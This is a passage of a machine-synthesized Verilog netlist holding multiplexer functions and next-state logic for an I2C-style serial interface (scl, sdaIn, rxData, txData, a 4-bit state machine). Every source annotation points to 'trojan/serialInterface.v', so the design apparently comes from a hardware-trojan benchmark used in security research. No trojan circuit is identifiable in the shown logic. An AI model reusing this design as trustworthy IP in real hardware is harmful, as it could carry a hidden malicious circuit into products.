  function [2:0] _216_;
    input [2:0] a;
    input [17:0] b;
    input [5:0] s;
    (* full_case = 32'd1 *)
    (* parallel_case = 32'd1 *)
    (* src = "trojan/serialInterface.v:0.0-0.0|trojan/serialInterface.v:129.3-323.10" *)
    (* parallel_case *)
    casez (s)
      6'b?????1:
        _216_ = b[2:0];
      6'b????1?:
        _216_ = b[5:3];
      6'b???1??:
        _216_ = b[8:6];
      6'b??1???:
        _216_ = b[11:9];
      6'b?1????:
        _216_ = b[14:12];
      6'b1?????:
        _216_ = b[17:15];
      default:
        _216_ = a;
    endcase
  endfunction
  assign next_bitCnt = _216_(3'hx, { 3'h0, _087_, _085_, _084_, _080_, _079_ }, { _078_, _073_, _086_, _077_, _081_, _071_ });
  assign _080_ = scl ? (* src = "trojan/serialInterface.v:236.11-236.22|trojan/serialInterface.v:236.7-241.10" *) 3'h0 : 3'hx;
  assign _083_ = scl ? (* src = "trojan/serialInterface.v:220.16-220.27|trojan/serialInterface.v:220.12-232.10" *) 3'hx : _082_;
  assign _082_ = _058_ ? (* src = "trojan/serialInterface.v:0.0-0.0|trojan/serialInterface.v:208.9-216.16" *) _001_ : bitCnt;
  assign _058_ = ! (* src = "trojan/serialInterface.v:0.0-0.0|trojan/serialInterface.v:208.9-216.16" *) startStopDetState;
  assign _084_ = _062_ ? (* full_case = 32'd1 *) (* src = "trojan/serialInterface.v:204.11-205.59|trojan/serialInterface.v:204.7-232.10" *) _082_ : _083_;
  assign _085_ = _055_ ? (* full_case = 32'd1 *) (* src = "trojan/serialInterface.v:175.11-175.27|trojan/serialInterface.v:175.7-183.10" *) 3'hx : _001_;
  assign _087_ = _053_ ? (* full_case = 32'd1 *) (* src = "trojan/serialInterface.v:144.11-144.28|trojan/serialInterface.v:144.7-155.10" *) 3'h1 : 3'hx;
  assign _088_ = _089_ ? (* full_case = 32'd1 *) (* src = "trojan/serialInterface.v:0.0-0.0|trojan/serialInterface.v:249.9-271.16" *) rxData : 8'hxx;
  assign _090_ = _059_ ? (* full_case = 32'd1 *) (* src = "trojan/serialInterface.v:245.11-245.27|trojan/serialInterface.v:245.7-277.10" *) _088_ : 8'hxx;
  function [7:0] _226_;
    input [7:0] a;
    input [15:0] b;
    input [1:0] s;
    (* full_case = 32'd1 *)
    (* parallel_case = 32'd1 *)
    (* src = "trojan/serialInterface.v:0.0-0.0|trojan/serialInterface.v:129.3-323.10" *)
    (* parallel_case *)
    casez (s)
      2'b?1:
        _226_ = b[7:0];
      2'b1?:
        _226_ = b[15:8];
      default:
        _226_ = a;
    endcase
  endfunction
  assign next_dataOut = _226_(8'hxx, { 8'h00, _090_ }, { _078_, _071_ });
  function [0:0] _227_;
    input [0:0] a;
    input [1:0] b;
    input [1:0] s;
    (* full_case = 32'd1 *)
    (* parallel_case = 32'd1 *)
    (* src = "trojan/serialInterface.v:0.0-0.0|trojan/serialInterface.v:129.3-323.10" *)
    (* parallel_case *)
    casez (s)
      2'b?1:
        _227_ = b[0:0];
      2'b1?:
        _227_ = b[1:1];
      default:
        _227_ = a;
    endcase
  endfunction
  assign next_writeEn = _227_(1'hx, { _092_, 1'h0 }, { _071_, _047_ });
  assign _091_ = _089_ ? (* full_case = 32'd1 *) (* src = "trojan/serialInterface.v:0.0-0.0|trojan/serialInterface.v:249.9-271.16" *) 1'h1 : 1'hx;
  assign _089_ = streamSt == (* full_case = 32'd1 *) (* src = "trojan/serialInterface.v:0.0-0.0|trojan/serialInterface.v:249.9-271.16" *) 2'h3;
  assign _092_ = _059_ ? (* full_case = 32'd1 *) (* src = "trojan/serialInterface.v:245.11-245.27|trojan/serialInterface.v:245.7-277.10" *) _091_ : 1'hx;
  function [0:0] _231_;
    input [0:0] a;
    input [3:0] b;
    input [3:0] s;
    (* full_case = 32'd1 *)
    (* parallel_case = 32'd1 *)
    (* src = "trojan/serialInterface.v:0.0-0.0|trojan/serialInterface.v:129.3-323.10" *)
    (* parallel_case *)
    casez (s)
      4'b???1:
        _231_ = b[0:0];
      4'b??1?:
        _231_ = b[1:1];
      4'b?1??:
        _231_ = b[2:2];
      4'b1???:
        _231_ = b[3:3];
      default:
        _231_ = a;
    endcase
  endfunction
  assign next_sdaOut = _231_(1'hx, { 1'h1, _099_, _097_, _093_ }, { _078_, _100_, _071_, _050_ });
  assign _095_ = _064_ ? (* full_case = 32'd1 *) (* src = "trojan/serialInterface.v:251.13-252.35|trojan/serialInterface.v:251.9-259.29" *) 1'h0 : 1'h1;
  assign _096_ = _057_ ? (* full_case = 32'd1 *) (* src = "trojan/serialInterface.v:0.0-0.0|trojan/serialInterface.v:249.9-271.16" *) _095_ : 1'h0;
  assign _097_ = _059_ ? (* full_case = 32'd1 *) (* src = "trojan/serialInterface.v:245.11-245.27|trojan/serialInterface.v:245.7-277.10" *) _096_ : 1'hx;
  assign _093_ = scl ? (* src = "trojan/serialInterface.v:187.11-187.22|trojan/serialInterface.v:187.7-191.10" *) 1'hx : 1'h1;
  assign _099_ = scl ? (* src = "trojan/serialInterface.v:159.11-159.22|trojan/serialInterface.v:159.7-164.10" *) 1'hx : txData[7];
  function [7:0] _237_;
    input [7:0] a;
    input [31:0] b;
    input [3:0] s;
    (* full_case = 32'd1 *)
    (* parallel_case = 32'd1 *)
    (* src = "trojan/serialInterface.v:0.0-0.0|trojan/serialInterface.v:129.3-323.10" *)
    (* parallel_case *)
    casez (s)
      4'b???1:
        _237_ = b[7:0];
      4'b??1?:
        _237_ = b[15:8];
      4'b?1??:
        _237_ = b[23:16];
      4'b1???:
        _237_ = b[31:24];
      default:
        _237_ = a;
    endcase
  endfunction
  assign next_rxData = _237_(8'hxx, { 8'h00, _106_, _105_, _101_ }, { _078_, _073_, _077_, _051_ });
  assign _101_ = scl ? (* src = "trojan/serialInterface.v:236.11-236.22|trojan/serialInterface.v:236.7-241.10" *) { rxData[6:0], sdaIn } : 8'hxx;
  assign _104_ = scl ? (* src = "trojan/serialInterface.v:220.16-220.27|trojan/serialInterface.v:220.12-232.10" *) 8'hxx : _103_;
  assign _103_ = _061_ ? (* src = "trojan/serialInterface.v:0.0-0.0|trojan/serialInterface.v:208.9-216.16" *) 8'h00 : rxData;
  assign _105_ = _062_ ? (* full_case = 32'd1 *) (* src = "trojan/serialInterface.v:204.11-205.59|trojan/serialInterface.v:204.7-232.10" *) _103_ : _104_;
  assign _106_ = _053_ ? (* full_case = 32'd1 *) (* src = "trojan/serialInterface.v:144.11-144.28|trojan/serialInterface.v:144.7-155.10" *) 8'hxx : 8'h00;
  assign _107_ = scl ? (* src = "trojan/serialInterface.v:159.11-159.22|trojan/serialInterface.v:159.7-164.10" *) 8'hxx : { txData[6:0], 1'h0 };
  function [7:0] _244_;
    input [7:0] a;
    input [23:0] b;
    input [2:0] s;
    (* full_case = 32'd1 *)
    (* parallel_case = 32'd1 *)
    (* src = "trojan/serialInterface.v:0.0-0.0|trojan/serialInterface.v:129.3-323.10" *)
    (* parallel_case *)
    casez (s)
      3'b??1:
        _244_ = b[7:0];
      3'b?1?:
        _244_ = b[15:8];
      3'b1??:
        _244_ = b[23:16];
      default:
        _244_ = a;
    endcase
  endfunction
  assign next_txData = _244_(8'hxx, { 8'h00, _108_, _107_ }, { _078_, _073_, _100_ });
  assign _108_ = _053_ ? (* full_case = 32'd1 *) (* src = "trojan/serialInterface.v:144.11-144.28|trojan/serialInterface.v:144.7-155.10" *) dataIn : 8'hxx;
  function [1:0] _246_;
    input [1:0] a;
    input [3:0] b;
    input [1:0] s;
    (* full_case = 32'd1 *)
    (* src = "trojan/serialInterface.v:0.0-0.0|trojan/serialInterface.v:249.9-271.16" *)
    (* parallel_case *)
    casez (s)
      2'b?1:
        _246_ = b[1:0];
      2'b1?:
        _246_ = b[3:2];
      default:
        _246_ = a;
    endcase
  endfunction
  assign _109_ = _246_(2'hx, { _111_, 2'h3 }, { _057_, _069_ });
  assign _069_ = streamSt == (* full_case = 32'd1 *) (* src = "trojan/serialInterface.v:0.0-0.0|trojan/serialInterface.v:249.9-271.16" *) 2'h2;
  assign _110_ = rxData[0] ? (* full_case = 32'd1 *) (* src = "trojan/serialInterface.v:253.13-253.30|trojan/serialInterface.v:253.9-256.32" *) 2'h1 : 2'h2;
  assign _111_ = _064_ ? (* full_case = 32'd1 *) (* src = "trojan/serialInterface.v:251.13-252.35|trojan/serialInterface.v:251.9-259.29" *) _110_ : 2'hx;
  assign _057_ = ! (* full_case = 32'd1 *) (* src = "trojan/serialInterface.v:0.0-0.0|trojan/serialInterface.v:249.9-271.16" *) streamSt;
  assign _112_ = _059_ ? (* full_case = 32'd1 *) (* src = "trojan/serialInterface.v:245.11-245.27|trojan/serialInterface.v:245.7-277.10" *) _109_ : 2'hx;
  function [1:0] _252_;
    input [1:0] a;
    input [7:0] b;
    input [3:0] s;
    (* full_case = 32'd1 *)
    (* parallel_case = 32'd1 *)
    (* src = "trojan/serialInterface.v:0.0-0.0|trojan/serialInterface.v:129.3-323.10" *)
    (* parallel_case *)
    casez (s)
      4'b???1:
        _252_ = b[1:0];
      4'b??1?:
        _252_ = b[3:2];
      4'b?1??:
        _252_ = b[5:4];
      4'b1???:
        _252_ = b[7:6];
      default:
        _252_ = a;
    endcase
  endfunction
  assign next_streamSt = _252_(2'hx, { 2'h0, _117_, _115_, _112_ }, { _078_, _118_, _077_, _071_ });
  assign _113_ = _061_ ? (* src = "trojan/serialInterface.v:0.0-0.0|trojan/serialInterface.v:223.9-231.16" *) 2'h0 : 2'hx;
  assign _061_ = startStopDetState == (* src = "trojan/serialInterface.v:0.0-0.0|trojan/serialInterface.v:223.9-231.16" *) 2'h1;
  assign _114_ = scl ? (* src = "trojan/serialInterface.v:220.16-220.27|trojan/serialInterface.v:220.12-232.10" *) 2'hx : _113_;
  assign _115_ = _062_ ? (* full_case = 32'd1 *) (* src = "trojan/serialInterface.v:204.11-205.59|trojan/serialInterface.v:204.7-232.10" *) 2'h0 : _114_;
  assign _116_ = sdaIn ? (* src = "trojan/serialInterface.v:198.13-198.26|trojan/serialInterface.v:198.9-199.32" *) 2'h0 : 2'hx;
  assign _117_ = scl ? (* src = "trojan/serialInterface.v:195.11-195.22|trojan/serialInterface.v:195.7-200.10" *) _116_ : 2'hx;
  function [3:0] _259_;
    input [3:0] a;
    input [59:0] b;
    input [14:0] s;
    (* full_case = 32'd1 *)
    (* parallel_case = 32'd1 *)
    (* src = "trojan/serialInterface.v:0.0-0.0|trojan/serialInterface.v:129.3-323.10" *)
    (* parallel_case *)
    casez (s)
      15'b??????????????1:
        _259_ = b[3:0];
      15'b?????????????1?:
        _259_ = b[7:4];
      15'b????????????1??:
        _259_ = b[11:8];
      15'b???????????1???:
        _259_ = b[15:12];
      15'b??????????1????:
        _259_ = b[19:16];
      15'b?????????1?????:
        _259_ = b[23:20];
      15'b????????1??????:
        _259_ = b[27:24];
      15'b???????1???????:
        _259_ = b[31:28];
      15'b??????1????????:
        _259_ = b[35:32];
      15'b?????1?????????:
        _259_ = b[39:36];
      15'b????1??????????:
        _259_ = b[43:40];
      15'b???1???????????:
        _259_ = b[47:44];
      15'b??1????????????:
        _259_ = b[51:48];
      15'b?1?????????????:
        _259_ = b[55:52];
      15'b1??????????????:
        _259_ = b[59:56];
      default:
        _259_ = a;
    endcase
  endfunction
  assign NextState_SISt = _259_(4'hx, { _134_, _133_, _131_, _130_, _129_, _128_, _127_, _125_, _124_, _122_, _121_, _120_, _119_, 8'hd1 }, { _073_, _100_, _132_, _086_, _098_, _118_, _077_, _081_, _071_, _123_, _102_, _094_, _075_, _067_, _048_ });
  assign _074_ = CurrState_SISt == (* full_case = 32'd1 *) (* parallel_case = 32'd1 *) (* src = "trojan/serialInterface.v:0.0-0.0|trojan/serialInterface.v:129.3-323.10" *) 4'hf;
  assign _067_ = CurrState_SISt == (* full_case = 32'd1 *) (* parallel_case = 32'd1 *) (* src = "trojan/serialInterface.v:0.0-0.0|trojan/serialInterface.v:129.3-323.10" *) 4'he;
  assign _119_ = scl ? (* src = "trojan/serialInterface.v:305.11-305.22|trojan/serialInterface.v:305.7-308.10" *) 4'hc : 4'hx;
  assign _075_ = CurrState_SISt == (* full_case = 32'd1 *) (* parallel_case = 32'd1 *) (* src = "trojan/serialInterface.v:0.0-0.0|trojan/serialInterface.v:129.3-323.10" *) 4'hd;
  assign _120_ = scl ? (* src = "trojan/serialInterface.v:296.11-296.22|trojan/serialInterface.v:296.7-300.10" *) 4'hx : 4'h1;
  assign _094_ = CurrState_SISt == (* full_case = 32'd1 *) (* parallel_case = 32'd1 *) (* src = "trojan/serialInterface.v:0.0-0.0|trojan/serialInterface.v:129.3-323.10" *) 4'hc;
  assign _121_ = scl ? (* src = "trojan/serialInterface.v:288.11-288.22|trojan/serialInterface.v:288.7-292.10" *) 4'ha : 4'hx;
  assign _102_ = CurrState_SISt == (* full_case = 32'd1 *) (* parallel_case = 32'd1 *) (* src = "trojan/serialInterface.v:0.0-0.0|trojan/serialInterface.v:129.3-323.10" *) 4'hb;
  assign _122_ = scl ? (* src = "trojan/serialInterface.v:281.11-281.22|trojan/serialInterface.v:281.7-284.10" *) 4'hx : 4'h9;
  assign _123_ = CurrState_SISt == (* full_case = 32'd1 *) (* parallel_case = 32'd1 *) (* src = "trojan/serialInterface.v:0.0-0.0|trojan/serialInterface.v:129.3-323.10" *) 4'ha;
  assign _124_ = _059_ ? (* full_case = 32'd1 *) (* src = "trojan/serialInterface.v:245.11-245.27|trojan/serialInterface.v:245.7-277.10" *) 4'he : 4'hb;
  assign _071_ = CurrState_SISt == (* full_case = 32'd1 *) (* parallel_case = 32'd1 *) (* src = "trojan/serialInterface.v:0.0-0.0|trojan/serialInterface.v:129.3-323.10" *) 4'h9;
  assign _125_ = scl ? (* src = "trojan/serialInterface.v:236.11-236.22|trojan/serialInterface.v:236.7-241.10" *) 4'h7 : 4'hx;
  assign _081_ = CurrState_SISt == (* full_case = 32'd1 *) (* parallel_case = 32'd1 *) (* src = "trojan/serialInterface.v:0.0-0.0|trojan/serialInterface.v:129.3-323.10" *) 4'h8;
  assign _126_ = scl ? (* src = "trojan/serialInterface.v:220.16-220.27|trojan/serialInterface.v:220.12-232.10" *) 4'hx : 4'hb;
  assign _127_ = _062_ ? (* full_case = 32'd1 *) (* src = "trojan/serialInterface.v:204.11-205.59|trojan/serialInterface.v:204.7-232.10" *) 4'hf : _126_;
  assign _077_ = CurrState_SISt == (* full_case = 32'd1 *) (* parallel_case = 32'd1 *) (* src = "trojan/serialInterface.v:0.0-0.0|trojan/serialInterface.v:129.3-323.10" *) 4'h7;
  assign _128_ = scl ? (* src = "trojan/serialInterface.v:195.11-195.22|trojan/serialInterface.v:195.7-200.10" *) 4'h1 : 4'hx;
  assign _118_ = CurrState_SISt == (* full_case = 32'd1 *) (* parallel_case = 32'd1 *) (* src = "trojan/serialInterface.v:0.0-0.0|trojan/serialInterface.v:129.3-323.10" *) 4'h6;
  assign _129_ = scl ? (* src = "trojan/serialInterface.v:187.11-187.22|trojan/serialInterface.v:187.7-191.10" *) 4'hx : 4'h6;
  assign _098_ = CurrState_SISt == (* full_case = 32'd1 *) (* parallel_case = 32'd1 *) (* src = "trojan/serialInterface.v:0.0-0.0|trojan/serialInterface.v:129.3-323.10" *) 4'h5;
  assign _130_ = _055_ ? (* full_case = 32'd1 *) (* src = "trojan/serialInterface.v:175.11-175.27|trojan/serialInterface.v:175.7-183.10" *) 4'h5 : 4'h2;
  assign _086_ = CurrState_SISt == (* full_case = 32'd1 *) (* parallel_case = 32'd1 *) (* src = "trojan/serialInterface.v:0.0-0.0|trojan/serialInterface.v:129.3-323.10" *) 4'h4;
  assign _131_ = scl ? (* src = "trojan/serialInterface.v:168.11-168.22|trojan/serialInterface.v:168.7-171.10" *) 4'h4 : 4'hx;
  assign _132_ = CurrState_SISt == (* full_case = 32'd1 *) (* parallel_case = 32'd1 *) (* src = "trojan/serialInterface.v:0.0-0.0|trojan/serialInterface.v:129.3-323.10" *) 4'h3;
  assign _133_ = scl ? (* src = "trojan/serialInterface.v:159.11-159.22|trojan/serialInterface.v:159.7-164.10" *) 4'hx : 4'h3;
  assign _100_ = CurrState_SISt == (* full_case = 32'd1 *) (* parallel_case = 32'd1 *) (* src = "trojan/serialInterface.v:0.0-0.0|trojan/serialInterface.v:129.3-323.10" *) 4'h2;
  assign _134_ = _053_ ? (* full_case = 32'd1 *) (* src = "trojan/serialInterface.v:144.11-144.28|trojan/serialInterface.v:144.7-155.10" *) 4'h2 : 4'h8;
  assign _073_ = CurrState_SISt == (* full_case = 32'd1 *) (* parallel_case = 32'd1 *) (* src = "trojan/serialInterface.v:0.0-0.0|trojan/serialInterface.v:129.3-323.10" *) 4'h1;
  assign _078_ = ! (* full_case = 32'd1 *) (* parallel_case = 32'd1 *) (* src = "trojan/serialInterface.v:0.0-0.0|trojan/serialInterface.v:129.3-323.10" *) CurrState_SISt;
endmodule
